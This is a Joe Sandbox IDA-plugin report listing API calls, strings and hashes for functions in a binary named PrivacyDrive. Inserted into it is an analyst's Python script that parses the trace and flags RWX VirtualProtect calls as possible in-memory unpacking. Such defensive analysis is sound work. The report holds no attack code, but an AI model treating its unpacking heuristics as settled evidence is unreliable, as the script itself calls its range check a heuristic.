                                • Opcode Fuzzy Hash: d3fdda6977b5add1d8449eff889fc7f63bc45f5e4cbb85ecbf298274748bdbb1
                                • Instruction Fuzzy Hash: 4E81F7B0905249DEDB05CF68C51879ABFF4FF16318F24819DD408AF392D3BA9A09DB91
                                APIs
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000002), ref: 004025FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek$Concurrency::details::_Concurrent_queue_base_v4::_ControlDeviceInternal_throw_exception_malloc
                                • String ID: list<T> too long$[
                                • API String ID: 198154210-1700255231
                                • Opcode ID: eb04e13b04f29042d0268d7e3f1825a3904ed4797e65bd5829df465d64a30d9a
                                • Instruction ID: 5bfe017c1d075ea3c3b1c90e75c0c42364a54a30971ee20f6fd7985f3f173334
                                • Opcode Fuzzy Hash: eb04e13b04f29042d0268d7e3f1825a3904ed4797e65bd5829df465d64a30d9a
                                • Instruction Fuzzy Hash: 8651C574900208ABDB14CB64CA5ABEEBBB5FF44314F24053AE511B73C0D7B96A44CB69
                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,00000000,7563D392,?,?,00000000,?,?,005453B6,000000FF,?,0044860E,?,?), ref: 00475237
                                • VirtualProtect.KERNEL32(?,?,00583BB8,00000000), ref: 00475371
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: aes
                                • API String ID: 544645111-1741866849
                                • Opcode ID: a26ecac06fc112e09cba3384c61047435bde0186e7887d07941b142ca819a9dc
                                • Instruction ID: c7f102ab8efc31625e05e908843ee0437d29b426c9a67cbfe1a089473b48b124
                                • Opcode Fuzzy Hash: a26ecac06fc112e09cba3384c61047435bde0186e7887d07941b142ca819a9dc
                                • Instruction Fuzzy Hash: 5251F7711087416FE320DB25CC4AFAFBBE8AF88754F44051EFA48962D1EBB4E904C766
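The two VirtualProtect calls above are the kind of trace entry that deserves a closer look than the rest of this listing: the first passes 0x40 (PAGE_EXECUTE_READWRITE) as flNewProtect in a function that also references the string "aes", while the second shows 0x583BB8 in the same argument slot, which is an address in the image's data range rather than a protection constant. As an added example (not part of the Joe Sandbox report and not Joe Sandbox tooling), the script below parses the report's "APIs" lines, flags RWX protection changes, flags flNewProtect values that cannot be a PAGE_* constant (a sign that the sandbox's stack-argument recovery is off for that call, so the value should not be quoted as evidence), and decodes the WM_SYSCOMMAND (0x0112) posts from the ShowWindow block into their SC_* names. The sample trace is constructed from lines copied from this report; the PAGE_* range check (any bit above 0x7FF set) is this example's own heuristic.

```python
"""Parse Joe Sandbox-style 'APIs' trace lines and annotate the ones that
matter when reading a report. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed sample: the lines are copied from the API tables in this
# report. Report format:  • <Api>.<MODULE>(<arg>,<arg>,...), ref: <addr>
SAMPLE_TRACE = """\
• VirtualProtect.KERNEL32(?,?,00000040,00000000,7563D392,?,?,00000000,?,?,005453B6,000000FF,?,0044860E,?,?), ref: 00475237
• VirtualProtect.KERNEL32(?,?,00583BB8,00000000), ref: 00475371
• ShowWindow.USER32(?,?,?,00489CEF,-00000005), ref: 004D4869
• PostMessageW.USER32(?,00000112,0000F120,00000000), ref: 004D4882
• PostMessageW.USER32(?,00000112,0000F020,00000000), ref: 004D489B
• PostMessageW.USER32(?,00000112,0000F030,00000000), ref: 004D48B4
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 004347AC
"""

LINE_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

PAGE_EXECUTE_READWRITE = 0x40
PAGE_FLAG_MASK = 0x7FF          # PAGE_* constants and their modifiers live below this
WM_SYSCOMMAND = 0x0112
SC_NAMES = {0xF020: "SC_MINIMIZE", 0xF030: "SC_MAXIMIZE", 0xF120: "SC_RESTORE"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for hex values, None for '?', str otherwise
    ref: int              # address of the call site
    notes: list = field(default_factory=list)


def parse_arg(tok):
    """'?' -> None; hex (optionally negative) -> int; anything else -> str."""
    tok = tok.strip()
    if tok in ("?", ""):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok


def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # headers, 'Strings', etc.
        api, module, argstr, ref = m.groups()
        args = [parse_arg(a) for a in argstr.split(",")]
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


def annotate(calls):
    for c in calls:
        a = c.args
        if c.api == "VirtualProtect" and len(a) > 2 and isinstance(a[2], int):
            prot = a[2]                   # flNewProtect is the third argument
            if prot == PAGE_EXECUTE_READWRITE:
                c.notes.append("RWX page: possible in-memory unpacking or code decryption")
            elif prot & ~PAGE_FLAG_MASK:
                c.notes.append(
                    f"flNewProtect 0x{prot:08X} is not a PAGE_* constant; "
                    "argument recovery is probably unreliable for this call")
        if c.api == "PostMessageW" and len(a) > 2 and a[1] == WM_SYSCOMMAND \
                and isinstance(a[2], int):
            w = a[2] & 0xFFF0             # low 4 bits of wParam are reserved
            c.notes.append(f"WM_SYSCOMMAND wParam 0x{w:04X} = {SC_NAMES.get(w, 'unknown')}")
    return calls


def findings(text):
    """(api, ref, note) triples for every annotated call, in trace order."""
    return [(c.api, c.ref, n) for c in annotate(parse_trace(text)) for n in c.notes]


if __name__ == "__main__":
    for api, ref, note in findings(SAMPLE_TRACE):
        print(f"{api:<16} @ {ref:08X}: {note}")
```

Run on the sample above it reports the RWX change at 00475237, the implausible flNewProtect at 00475371, and restore/minimize/maximize for the three PostMessageW calls. The implausible-constant check matters in practice: a VirtualProtect entry only supports an unpacking claim when the recovered protection value is actually a protection value.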
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: expected >
                                • API String ID: 0-2131776098
                                • Opcode ID: 860c36a5622d6b1313a498e033aca5d6bed8216c118a33f16c4e8ce3f304ed1d
                                • Instruction ID: 11389b22c623f2744d9f42ce52ef85c0baad429e2c7341582c302e08c145dbae
                                • Opcode Fuzzy Hash: 860c36a5622d6b1313a498e033aca5d6bed8216c118a33f16c4e8ce3f304ed1d
                                • Instruction Fuzzy Hash: 49519CB0A042559ECB20CF5AC444ABABFF4FF09714F1445AAE494AB382D3749945CBE8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 3469917551e973ec293afed111e285f1fc0d4b7dff7816ac84445a26b7dcea9f
                                • Instruction ID: e9a7fcd289439b3e7619a7d62964bdc1ae14986dfd13999ab9b257cbe0806416
                                • Opcode Fuzzy Hash: 3469917551e973ec293afed111e285f1fc0d4b7dff7816ac84445a26b7dcea9f
                                • Instruction Fuzzy Hash: 82319F32300215CBD7249F5DE8C0A6AFBA5EB91B61F104A3FE5459B281D7B598408BA9
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0043A640
                                • _memmove.LIBCMT ref: 0043A656
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                                • String ID: vector<T> too long
                                • API String ID: 2765667529-3788999226
                                • Opcode ID: a0cb8a74f22d01c1193fdf22690157da368f054645643d81268f044b33ab62f5
                                • Instruction ID: 21a0b09cad63bf26704fb02307bfcc50a0cc9e699095894007cefd2f8ff12292
                                • Opcode Fuzzy Hash: a0cb8a74f22d01c1193fdf22690157da368f054645643d81268f044b33ab62f5
                                • Instruction Fuzzy Hash: FB314F72B40615AFC710CF6CD981A6AFBA9FB88760F24823BE915C3380D735A915C7D5
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00401976
                                • _memmove.LIBCMT ref: 00401990
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                                • String ID: vector<T> too long
                                • API String ID: 2765667529-3788999226
                                • Opcode ID: 89a72aa02af5b5b014c5f5594a3f225c1baa156e86108687fdb6d4f21da2613d
                                • Instruction ID: 312a17f11f13fec3570023aa0daaaf2ca619debc537378e2092afbdc1341ba46
                                • Opcode Fuzzy Hash: 89a72aa02af5b5b014c5f5594a3f225c1baa156e86108687fdb6d4f21da2613d
                                • Instruction Fuzzy Hash: CE31F7B2B006199FC710DF6CD980A6EFBA9EB84760B24833BE914D3380DA71E905C7D4
                                APIs
                                • GetLocalTime.KERNEL32(?,0040FFE5,005BE234,?,?,?,?,?,004B23C7,0000000F,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B295A
                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,004B23C7,0000000F,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B2980
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: sober128
                                • API String ID: 481472006-251668517
                                • Opcode ID: 7ae08b3b09bde5d5889d6c27c374dc32762ebe5732c6ed2bae499653117a6084
                                • Instruction ID: 4ab76d2494170d6258972ab40fe464f147b326dd6bc94717d85ff97468a225f2
                                • Opcode Fuzzy Hash: 7ae08b3b09bde5d5889d6c27c374dc32762ebe5732c6ed2bae499653117a6084
                                • Instruction Fuzzy Hash: 5D41BFB5A006059BCB10DF28D881ABAB7B4BF4C300F11422EE849D7351EB74A959DB91
                                APIs
                                • _memmove.LIBCMT ref: 0045E7B5
                                  • Part of subcall function 0045E800: _memmove.LIBCMT ref: 0045E86C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 4[P[$string too long
                                • API String ID: 4104443479-2375524141
                                • Opcode ID: 12f18fe5baf7a9690ccb309a3c17f90f572443e03d48b3260998b9ccead1cac4
                                • Instruction ID: da07d17d29a23d2e32459d0dccd0662c86c38c0c332d0b923a924280ac1c6841
                                • Opcode Fuzzy Hash: 12f18fe5baf7a9690ccb309a3c17f90f572443e03d48b3260998b9ccead1cac4
                                • Instruction Fuzzy Hash: 80310C353001105BC72C9E6ED88496AF7A9EF89751710492FFD9187782D734E949C398
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00545890,?,00000000,7563D392,?,?,00000000), ref: 00477B7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: !@$\\?\
                                • API String ID: 823142352-284777618
                                • Opcode ID: 75004e505afe15a003c7fe243976181826576212db250104529b65a082d1a944
                                • Instruction ID: d1d1b29543399528dd67c618d7b47b03897f947de5fed18103c0eec115e4b199
                                • Opcode Fuzzy Hash: 75004e505afe15a003c7fe243976181826576212db250104529b65a082d1a944
                                • Instruction Fuzzy Hash: 7F4158B1D00248EBDF10DFA9D849BDEBBB4FF04318F10812AE424B7280D7756A08CBA5
                                APIs
                                • VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                • VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HjG
                                • API String ID: 544645111-4133638772
                                • Opcode ID: f1e884a3b2631f5dd6f124811a1528878a932b6a2b8f4874528a006d90aee455
                                • Instruction ID: 5245b871116d1579b64f760935d460e980fb0fae71a921eb556ef9f14a67c246
                                • Opcode Fuzzy Hash: f1e884a3b2631f5dd6f124811a1528878a932b6a2b8f4874528a006d90aee455
                                • Instruction Fuzzy Hash: D811B472A04744ABDB10CF95DC44BAFBBB8EB46B25F10426AA928E7380E7755904C794
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: M
                                • API String ID: 4104443479-3526004983
                                • Opcode ID: abc80980bea67bdefa90ab877a5984b3a333246d66743f9a167aaa6be088c000
                                • Instruction ID: 20f0a4c349ed1b50f013f246a99e0d17de12b18f13d1139ffdb28d6563824e9c
                                • Opcode Fuzzy Hash: abc80980bea67bdefa90ab877a5984b3a333246d66743f9a167aaa6be088c000
                                • Instruction Fuzzy Hash: 42119172A01215AFDB21CFBCDD9899EBBE9EB40260B154636FC0AD7340E630AD14C691
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: M
                                • API String ID: 4104443479-3526004983
                                • Opcode ID: 9a5ef0188f72c72e31162be544a562c4e45a299950b12565c771b5d168b507a3
                                • Instruction ID: b344f8583a08161a34cdcbcfe53798f2e690683bcaa104ce930973685c33b9a9
                                • Opcode Fuzzy Hash: 9a5ef0188f72c72e31162be544a562c4e45a299950b12565c771b5d168b507a3
                                • Instruction Fuzzy Hash: B7115B36A00109ABCB20CF98EC90A9E7BB9EF85350F144066EC09A7340D636AA55CBA1
                                APIs
                                • _memset.LIBCMT ref: 00485971
                                • GetVolumeInformationW.KERNEL32(?,?,00000104,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00485993
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume_memset
                                • String ID: C:\
                                • API String ID: 3157072226-3404278061
                                • Opcode ID: 635f2170cec43ef065ba0954a08b62ab69aaca0ff061fcfdaded8806b9d6120a
                                • Instruction ID: d71efe12ed545dc3a141893c81f802d96d2a365eb777b89760df14d0d0ab5e1d
                                • Opcode Fuzzy Hash: 635f2170cec43ef065ba0954a08b62ab69aaca0ff061fcfdaded8806b9d6120a
                                • Instruction Fuzzy Hash: 68019B71B00318A7DB10DB95EC46F9E77B8FB48710F4041ABF504D7291EA74AA448B95
                                APIs
                                • UnregisterClassW.USER32(cbfx_ToolTipWnd,00000000), ref: 0042DA7D
                                • DeleteCriticalSection.KERNEL32(?,?,?,?,0053DED4,000000FF), ref: 0042DA9D
                                  • Part of subcall function 004CC6F0: ReleaseCapture.USER32 ref: 004CC7AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
